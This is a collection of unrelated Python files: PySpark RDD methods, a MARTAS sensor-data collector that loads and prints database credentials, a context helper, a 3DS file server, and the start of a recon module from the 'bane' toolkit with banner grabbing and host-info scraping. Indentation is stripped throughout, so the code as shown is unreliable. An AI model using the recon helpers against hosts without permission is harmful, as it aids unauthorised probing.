def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1]), list(y[2]), list(y[3])))), \
sorted(list(w.groupWith(x, y, z).collect())))
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func((key, vals)):
return vals[0] and not vals[1]
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if name_:
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1').name()
'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda (k, v): k == key).values()
if self._partitionFunc is not None:
return self.ctx.runJob(values, lambda x: x, [self._partitionFunc(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 950 < n < 1050
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 18 < n < 22
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
if relativeSD > 0.37:
raise ValueError("relativeSD should be smaller than 0.37")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
partitions = xrange(self.getNumPartitions())
for partition in partitions:
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# tracking the life cycle by obj
if obj is not None:
obj._broadcast = broadcast
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self._partitionFunc = prev._partitionFunc if self.preservesPartitioning else None
self._broadcast = None
def __del__(self):
if self._broadcast:
self._broadcast.unpersist()
self._broadcast = None
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
collector-martas.py
|
"""
Collector script for obtaining real time data from MARTAS machines
Collector accesses the autobahn websocket from MARTAS and retrieves data. This data is directly
added to a data bank (or file if preferred).
"""
import sys, os, csv
from twisted.python import log
from twisted.internet import reactor
try: # version > 0.8.0
from autobahn.wamp1.protocol import WampClientFactory, WampClientProtocol
except:
from autobahn.wamp import WampClientFactory, WampClientProtocol
try: # autovers > 0.7.0:
from autobahn.twisted.websocket import connectWS
except:
from autobahn.websocket import connectWS
# For converting Unicode text
import collections
from magpy.collector import subscribe2client as cl
from magpy.opt import cred as mpcred
from magpy.transfer import scptransfer
import pymysql as mysql
from multiprocessing import Process
import pwd
class MartasInfo():
"""
Class to obtain Sensor information from MARTAS.
scp process which is used for that purpose cannot
bin run as root. This would not allow to test for sensors
at bootup.
The MartasInfo class is run as an independent process by switching
to a standard user of the system.
class is currently not working because the actual version of pexpect.spawn returns an error...
"""
def GetSensors(self, user, scpuser, scppasswd, source, dest):
pw = pwd.getpwnam(user)
uid = pw.pw_uid
os.setuid(uid)
print ("setuid successful to", uid)
try:
scptransfer(scpuser+'@'+source,dest,scppasswd)
except:
print ("Could not connect to/get sensor info of client %s" % clientname)
# TODO
"""
a) check working state of db version for all sensors OW (OK), LEMI (OK), POS, CS, GSM, ENV (OK), etc
b) check working state of file version OW (OK), LEMI, POS, CS, GSM, ENV (OK), etc
c) (OK) check autorun of MARTAS on reboot (with .conf (OK) and .sh (OK))
d) check autorun of MARCOS on reboot (with .conf (?) and .sh (?))
e) (OK) check stability (no sensor attached (OK), OW sensor removed while running (OK), OW sensor added while running (Sytem failure on first try, OK on second - HOWEVER all other sensors get lost!!!), Other sensor: adding (requires restart of Martas and Marcos - Marcos is stopped))
f) automatically restart MARCOS once a day (when??, ideally shortly before scheduled upload)
g) add nagios test whether collcetors are running (add to MARCOS/Nagios)
h) (OK) add script to MARCOS for file upload by cron
i) add a websript like (single.html) to MARCOS/WebScripts
j) (OK) add a Version number to MARCOS and MARTAS (eventually add both of them to the MagPy folder...)
k) MARTAS tests: run through WLAN, UMTS
l) test file upload by stream2db before/after collector with changing db info in datainfo and sensor
m) future version: send commands
"""
if __name__ == '__main__':
# ----------------------------------------------------------
# 1. Define client (or get it from database?)
# ----------------------------------------------------------
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# do necessary changes below
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Name of martas
#clientname = 'raspberrypi'
clientname = 'ceres'
# IP of martas
clientip = '138.22.188.181'
# Path of MARTAS directory on martas machine
martaspath = '/home/cobs/MARTAS'
# Path of MARCOS directory
homedir = '/home/cobs'
defaultuser = 'cobs'
# Provide Station code
stationid = 'WIC'
# Select destination (file or db) - Files are saved in .../MARCOS/MartasFiles/
dest = 'db'
# For Testing purposes - Print received data to screen:
printdata = False
# Please make sure that the db and scp connection data is stored
# within the credential file -otherwise provide this data directly
dbhost = mpcred.lc('cobsdb','host',path='/home/cobs/.magpycred')
dbuser = mpcred.lc('cobsdb','user',path='/home/cobs/.magpycred')
dbpasswd = mpcred.lc('cobsdb','passwd',path='/home/cobs/.magpycred')
dbname = mpcred.lc('cobsdb','db',path='/home/cobs/.magpycred')
scpuser = mpcred.lc('ceres','user',path='/home/cobs/.magpycred')
scppasswd = mpcred.lc('ceres','passwd',path='/home/cobs/.magpycred')
# You can add to the credential file by using:
# mpcred.cc('transfer','myshortcut',user='myuser',passwd='mypasswd',address='no-specific')
# and than read it by scpuser = mpcred.lc('myshortcut','myuser')
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# do necessary changes above
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
print (dbhost, dbuser, dbpasswd, dbname, scpuser)
logfile = os.path.join(homedir,'MARCOS','Logs','marcos.log')
log.startLogging(open(logfile,'a'))
sshcredlst = [scpuser,scppasswd]
# ----------------------------------------------------------
# 2. connect to database and check availability and version
# ----------------------------------------------------------
try:
db = mysql.connect (host=dbhost,user=dbuser,passwd=dbpasswd,db=dbname)
dbcredlst = [dbhost,dbuser,dbpasswd,dbname]
except:
print ("Create a credential file first or provide login info for database directly")
raise
cursor = db.cursor ()
cursor.execute ("SELECT VERSION()")
row = cursor.fetchone ()
print ("MySQL server version:", row[0])
cursor.close ()
db.close ()
# ----------------------------------------------------------
# 3. connect to client and get sensor list as well as owlist
# ----------------------------------------------------------
print ("Locating MARCOS directory ...")
destpath = [path for path, dirs, files in os.walk("/home") if path.endswith('MARCOS')][0]
sensfile = os.path.join(martaspath,'sensors.txt')
owfile = os.path.join(martaspath,'owlist.csv')
destsensfile = os.path.join(destpath,'MartasSensors',clientname+'_sensors.txt')
destowfile = os.path.join(destpath,'MartasSensors',clientname+'_owlist.csv')
print ("Getting sensor information from ", clientname)
## to be activated if multiprocessing and pexpect are working again
#MI=MartasInfo()
#source = clientip+':'+sensfile
#p = Process(target=MI.GetSensors, args=('cobs',scpuser,scppasswd,source,destsensfile,))
#p.start()
#p.join()
#source = clientip+':'+owfile
#p = Process(target=MI.GetSensors, args=('cobs',scpuser,scppasswd,source,destowfile,))
#p.start()
#p.join()
# Please note: scp is not workings from root
# Therefore the following processes are performed as defaultuser (ideally as a subprocess)
uid=pwd.getpwnam(defaultuser)[2]
os.setuid(uid)
try:
print ("{}@{}:{}".format(scpuser,clientip,sensfile))
scptransfer(scpuser+'@'+clientip+':'+sensfile,destsensfile,scppasswd)
except:
print ("Could not connect to/get sensor info of client %s - aborting" % clientname)
sys.exit()
print ("Searching for onewire data from ", clientname)
try:
scptransfer(scpuser+'@'+clientip+':'+owfile,destowfile,scppasswd)
except:
print ("No one wire info available on client %s - proceeding" % clientname)
pass
s,o = [],[]
with open(destsensfile,'rb') as f:
reader = csv.reader(f)
s = []
for line in reader:
print (line)
if len(line) < 2:
try:
s.append(line[0].split())
except:
# Empty line for example
pass
else:
s.append(line)
print (s)
if os.path.exists(destowfile):
with open(destowfile,'rb') as f:
reader = csv.reader(f)
o = [line for line in reader]
print (o)
factory = WampClientFactory("ws://"+clientip+":9100", debugWamp = False)
cl.sendparameter(clientname,clientip,destpath,dest,stationid,sshcredlst,s,o,printdata,dbcredlst)
factory.protocol = cl.PubSubClient
connectWS(factory)
reactor.run()
try:
cursor.close()
db.close()
log.msg("DB closed")
except:
pass
|
context.py
|
import threading
from contextlib import contextmanager
class Context(threading.local):
def __init__(self):
self._ctx = [{}]
def __getattr__(self, name):
for scope in reversed(self._ctx):
if name in scope:
return scope[name]
raise AttributeError(name)
def get(self, name, default=None):
try:
return getattr(self, name)
except AttributeError:
return default
@contextmanager
def __call__(self, **attrs):
self._ctx.append(attrs)
try:
yield
finally:
_d = self._ctx.pop()
assert attrs is _d
def test_threading():
import random
import time
context = Context()
def f(i):
with context(i=i):
g(i)
def g(i):
assert context.i == i
time.sleep(random.random())
assert context.i == i
print(i, end=', ')
for i in range(100):
t = threading.Thread(target=f, args=(i,))
t.start()
# test_threading()
context = Context()
|
servefiles.py
|
#!/usr/bin/env python
# coding: utf-8 -*-
import os
import socket
import struct
import sys
import threading
import time
import urllib
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from urllib import quote
input = raw_input
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import quote
interactive = False
if len(sys.argv) <= 2:
# If there aren't enough variables, use interactive mode
if len(sys.argv) == 2:
if sys.argv[1].lower() in ('--help', '-help', 'help', 'h', '-h', '--h'):
print('Usage: ' + sys.argv[0] + ' <target ip> <file / directory> [host ip] [host port]')
sys.exit(1)
interactive = True
elif len(sys.argv) < 3 or len(sys.argv) > 6:
print('Usage: ' + sys.argv[0] + ' <target ip> <file / directory> [host ip] [host port]')
sys.exit(1)
accepted_extension = ('.cia', '.tik', '.cetk', '.3dsx')
hostPort = 8080 # Default value
if interactive:
target_ip = input("The IP of your 3DS: ")
target_path = input("The file you want to send (.cia, .tik, .cetk, or .3dsx): ")
hostIp = input("Host IP (or press Enter to have the script detect host IP):")
if hostIp == '':
print('Detecting host IP...')
hostIp = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
else:
hostPort = input("Host port (or press Enter to keep default, 8080):")
if hostPort == '':
hostPort = 8080 # Default
else:
# (if the script is being run using a full python path; ex: "path/to/python script_name.py foo foo..")
if sys.argv[1] == os.path.basename(__file__):
target_ip = sys.argv[2]
target_path = sys.argv[3]
if len(sys.argv) >= 5:
hostIp = sys.argv[4]
if len(sys.argv) == 6:
hostPort = int(sys.argv[5])
else:
print('Detecting host IP...')
hostIp = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
# (if the script is being run using just the script name and default executable for python scripts; ex: "script_name.py foo foo..")
else:
target_ip = sys.argv[1]
target_path = sys.argv[2]
if len(sys.argv) >= 4:
hostIp = sys.argv[3]
if len(sys.argv) == 5:
hostPort = int(sys.argv[4])
else:
print('Detecting host IP...')
hostIp = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
if not os.path.exists(target_path):
print(target_path + ': No such file or directory.')
sys.exit(1)
print('Preparing data...')
baseUrl = hostIp + ':' + str(hostPort) + '/'
if os.path.isfile(target_path):
if target_path.endswith(accepted_extension):
file_list_payload = baseUrl + quote(os.path.basename(target_path))
directory = os.path.dirname(target_path) # get file directory
else:
print('Unsupported file extension. Supported extensions are: ' + accepted_extension)
sys.exit(1)
else:
directory = target_path # it's a directory
file_list_payload = '' # init the payload before adding lines
for file in [file for file in next(os.walk(target_path))[2] if file.endswith(accepted_extension)]:
file_list_payload += baseUrl + quote(file) + '\n'
if len(file_list_payload) == 0:
print('No files to serve.')
sys.exit(1)
file_list_payloadBytes = file_list_payload.encode('ascii')
if directory and directory != '.': # doesn't need to move if it's already the current working directory
os.chdir(directory) # set working directory to the right folder to be able to serve files
print('\nURLs:')
print(file_list_payload + '\n')
class MyServer(TCPServer):
def server_bind(self):
import socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
print('Opening HTTP server on port ' + str(hostPort))
server = MyServer(('', hostPort), SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
try:
print('Sending URL(s) to ' + target_ip + ' on port 5000...')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 5000))
sock.sendall(struct.pack('!L', len(file_list_payloadBytes)) + file_list_payloadBytes)
while len(sock.recv(1)) < 1:
time.sleep(0.05)
sock.close()
except Exception as e:
print('An error occurred: ' + str(e))
server.shutdown()
sys.exit(1)
print('Shutting down HTTP server...')
server.shutdown()
|
info_s.py
|
import requests,urllib,socket,random,time,re,threading,sys,whois,json,os,xtelnet
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *
if os.path.isdir('/data/data/com.termux/')==False:
import dns.resolver
def get_banner(u,p=23,timeout=3,payload=None):
try:
return xtelnet.get_banner(u,p=p,timeout=timeout,payload=payload)
except:
return None
def info(u,timeout=10,proxy=None):
'''
this function fetchs all informations about the given ip or domain using check-host.net and returns them to the use as string
with this format:
'requested information: result'
it takes 2 arguments:
u: ip or domain
timeout: (set by default to: 10) timeout flag for the request
usage:
>>>import bane
>>>domain='www.google.com'
>>>bane.info(domain)
'''
if proxy:
proxy={'http':'http://'+proxy}
try:
h=''
u='https://check-host.net/ip-info?host='+u
c=requests.get(u, headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
soup = BeautifulSoup(c,"html.parser")
d=soup.find_all("tr")
for a in d:
try:
b=str(a)
if "IP address" not in b:
a=b.split('<td>')[1].split('!')[0]
a=a.split('</td>')[0].split('!')[0]
c=b.split('<td>')[2].split('!')[0]
c=c.split('</td>')[0].split('!')[0]
if "strong" in c:
for n in ['</strong>','<strong>']:
